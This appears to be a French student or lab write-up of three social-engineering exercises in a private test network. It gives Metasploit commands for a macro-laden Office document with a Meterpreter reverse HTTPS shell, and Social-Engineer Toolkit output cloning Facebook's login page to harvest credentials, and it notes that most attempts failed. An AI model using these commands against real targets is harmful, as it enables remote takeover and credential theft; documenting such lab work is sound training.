Social engineering
Scenario 1⚓︎
Préparation d'un doccument Office 2013 avec un payload
msfconsole
use exploit/multi/fileformat/office_word_macro
set payload windows/meterpreter/reverse_https
set host 192.168.10.10
set lport 8000
exploit
Je n'ai pas pu ouvrir le document ni installer Office sur la VM
Scenario 2⚓︎
Phising à l'aide du clonage d'un site sain.
Une fois l'interface web chargée, on suit les instructions du README:
- "Clear Apache"
- "Start Apache Service"
Malhereusement, chaque choix qu'on peut sélectionner nous renvoie une 404 et la page web est redirigée vers un output de logs vide (voir captures ci-après). Il semblerait que la repo ne soit plus mise à jour depuis plus de deux ans.
Scenario 3⚓︎
Phising à l'aide du clonage d'un site sain.
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone: https://www.facebook.com
[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
Stopping apache2 (via systemctl): apache2.service.
Stopping nginx (via systemctl): nginx.service.
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.
L'attaque ne fonctionne pas, sans doute a cause de l'obsolescence du navigateur de Windows.
192.168.10.30 - - [16/Jun/2024 18:48:40] "GET / HTTP/1.1" 200 -
192.168.10.30 - - [16/Jun/2024 18:48:42] "GET /favicon.ico HTTP/1.1" 404 -
On essaie a nouveau depuis Kali-même:
Ajouter image
La sortie est très verbeuse, avec beaucoup de faux positifs, mais en cherchant on trouve le champs de login :
Malhersuement, le mot de passe reste introuvable, même après avoir lancé une recherche dans le fichier XML exporté.